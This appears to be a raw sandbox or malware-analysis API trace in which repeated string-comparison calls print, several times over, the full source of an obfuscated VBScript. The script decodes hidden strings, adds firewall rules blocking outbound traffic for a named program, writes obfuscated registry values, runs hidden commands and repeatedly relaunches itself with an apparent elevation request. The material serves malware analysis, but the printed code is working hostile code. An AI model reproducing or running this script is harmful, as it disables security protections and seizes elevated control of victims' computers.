bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.280] wcsncmp (_String1="y\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 108 [0226.280] wcsncmp (_String1="\r\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 29 [0226.280] wcsncmp (_String1="\nDim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.280] wcsncmp (_String1="Dim index\r\nDim sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, 